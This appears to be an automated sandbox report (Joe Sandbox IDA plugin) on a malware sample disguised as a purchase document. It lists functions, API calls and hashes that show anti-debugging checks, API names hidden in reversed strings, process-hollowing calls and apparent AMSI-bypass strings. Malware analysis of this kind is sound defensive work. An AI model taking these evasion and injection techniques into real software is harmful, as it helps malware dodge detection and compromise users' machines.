                                                                                                                                                                                                                          • API String ID: 1002360270-4067648912
                                                                                                                                                                                                                          • Opcode ID: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
                                                                                                                                                                                                                          • Instruction ID: 02ea73879296f6fb652ecd6f8a8c70ed97984c2c0df079b6b8ef83159f43f98d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15F0FFF0AE9314EEE310A668AA49F93B3DCD380790F0089A9F90C87142CE701856AB20
                                                                                                                                                                                                                          Function 02B2F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 13222 2b2f744-2b2f75e GetModuleHandleW 13223 2b2f760-2b2f772 GetProcAddress 13222->13223 13224 2b2f78a-2b2f792 13222->13224 13223->13224 13225 2b2f774-2b2f784 CheckRemoteDebuggerPresent 13223->13225 13225->13224 13226 2b2f786 13225->13226 13226->13224
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B2F754
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B2F766
                                                                                                                                                                                                                          • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B2F77D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                                                                                                                                                          • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                                                                                                          • API String ID: 35162468-539270669
                                                                                                                                                                                                                          • Opcode ID: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
                                                                                                                                                                                                                          • Instruction ID: 362bd32dab411d132a2f7e16cf33f8bd7dadee8321ae1eea48ff71547cdee55a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea713b1c3d4f753c790bcd234f6d772a23eb27b1fcafda0fc67e9df7fa9fd7aa
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4F0A770904358BAEB11A6B888887ECFBB99B05328F6447D0A439625E1E7710648CA51
                                                                                                                                                                                                                          Function 02B2DD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDAB
                                                                                                                                                                                                                          • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B2DE40), ref: 02B2DDDB
                                                                                                                                                                                                                          • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B2DDF0
                                                                                                                                                                                                                          • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B2DE1C
                                                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B2DE25
                                                                                                                                                                                                                            • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1897104825-0
                                                                                                                                                                                                                          • Opcode ID: 0badbdc25c7e1589eff380e224c19986f6f39f26ebe1cfa3ef10acfbeb9b070f
                                                                                                                                                                                                                          • Instruction ID: cb33507f0371fe68966ae60c1350d619d561fbe3f02e67a5a19d6daea7cbe546
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0badbdc25c7e1589eff380e224c19986f6f39f26ebe1cfa3ef10acfbeb9b070f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F821E071A50319BAEB11EBD4CC56FDE77BDEB48700F5044A5B304F7180DA74AA048B64
                                                                                                                                                                                                                          Function 02B2E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B2E5F6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CheckConnectionInternet
                                                                                                                                                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                                                          • API String ID: 3847983778-3852638603
                                                                                                                                                                                                                          • Opcode ID: e3b2b2f987f9187334b66722ff01fcecfabdd4b0f0092ece32a07e1001e618b3
                                                                                                                                                                                                                          • Instruction ID: 28ddd1e5e8056753ebbe205609be8432b399c9c2c0731bab44ad2b1bc0701bb1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3b2b2f987f9187334b66722ff01fcecfabdd4b0f0092ece32a07e1001e618b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD413975B002189FEB01EBA4D881ADEB3BAEF88700FA044B6E145E7255DA70FD098F55
                                                                                                                                                                                                                          Function 02B2DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B14F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02B14F2E
                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B2DD5E), ref: 02B2DCCB
                                                                                                                                                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B2DD05
                                                                                                                                                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B2DD32
                                                                                                                                                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B2DD3B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3764614163-0
                                                                                                                                                                                                                          • Opcode ID: 6c1762db6b4a9aa2cc43e0484604410445ae9adca72218fdcab02a2f436e8ad3
                                                                                                                                                                                                                          • Instruction ID: f136d701f76cf2452534bb099dad970d2e84d65eb49685b700266cf4fc268102
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c1762db6b4a9aa2cc43e0484604410445ae9adca72218fdcab02a2f436e8ad3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9321E071A40319BEEB10EBA0DD56FDEB7BDEB04B00F5144A1B604F71D0DBB4AA048A64
                                                                                                                                                                                                                          Function 02B28788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                                                                                                                          • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                                                                                                          • API String ID: 3130163322-2353454454
                                                                                                                                                                                                                          • Opcode ID: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                                                                                                                          • Instruction ID: b4156115f14dee8d39c35aa82bb7842d7eaaf1645aaf0c428994067ac26b9ea6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5833ddcd2b10ff4a9cef86b2532c85ed18205b821ec5360ba91f2bcf9a9fb451
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9211E5B2654258AFEB40EFA8DD41F9A77EDEB0C740F5144A0FA08D7250C634FD159B25
                                                                                                                                                                                                                          Function 02B27A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                                                                          • Opcode ID: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                                                                                                                          • Instruction ID: d23e4f91fa0960da7e273cc3fe5a9162521a241682b36118c561ac0a532a118c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43a9bc2ccc36254b3e890de2d70476f6f1dbc28d1dabb11641960a93debf0f74
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1116DB5654308BFEB00EFA4DC41EAEB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                                                                                                                          Function 02B27A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                                                                                                          • API String ID: 4072585319-445027087
                                                                                                                                                                                                                          • Opcode ID: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                                                                                                                          • Instruction ID: 8388146c6a95389dc2769de29c0f941351b9eb95c78c470c125d64e1f822c128
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1f661b269c2041d765f4d2cd6ec15c778d9f91efc5e90e2ddbf27126233e6da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D116DB5654308BFEB00EFA4DC41E9EB7FDEB49710F9084A0F904D7250DA30AA049B69
                                                                                                                                                                                                                          Function 02B28400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                                                                                                                                                          • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                                                                                                          • API String ID: 2521977463-737317276
                                                                                                                                                                                                                          • Opcode ID: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
                                                                                                                                                                                                                          • Instruction ID: 4416821152efddc7df5757196051053e39fe12a0bcaf38e925373375cc6836f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2302c5452c72cc4b74f3376c450b93363e90a82bcc714541f05f1224b3399bdf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E0140B5644318BFEB00EFA4DC41E9AB7FDEB4D700F9184A0F908D7650DA34A9159B64
                                                                                                                                                                                                                          Function 02B27D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                                                                                                                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                                                                                                          • API String ID: 2719805696-3542721025
                                                                                                                                                                                                                          • Opcode ID: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
                                                                                                                                                                                                                          • Instruction ID: ddbd965f134c26a55d869f5fea77957af354fd61dad7dd9a68ceb4cbc746443f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84e0a488bf2ab2176ac38dbde07737796b017b087401e4d8b03ec6f5f8e4d1a6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14012DB5654314AFDB00EFA8DC41E5AB7EDEB49700F908890B908D7650DA30AD159B75
                                                                                                                                                                                                                          Function 02B28670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                                                                                                                            • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                                                                                                                            • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1587499429.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587450312.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1587790869.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1588336495.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b10000_PURCHASE REQUIRED DETAILS 000487958790903403.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                                                                                                                                                          • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                                                                                                          • API String ID: 3503870465-2520021413
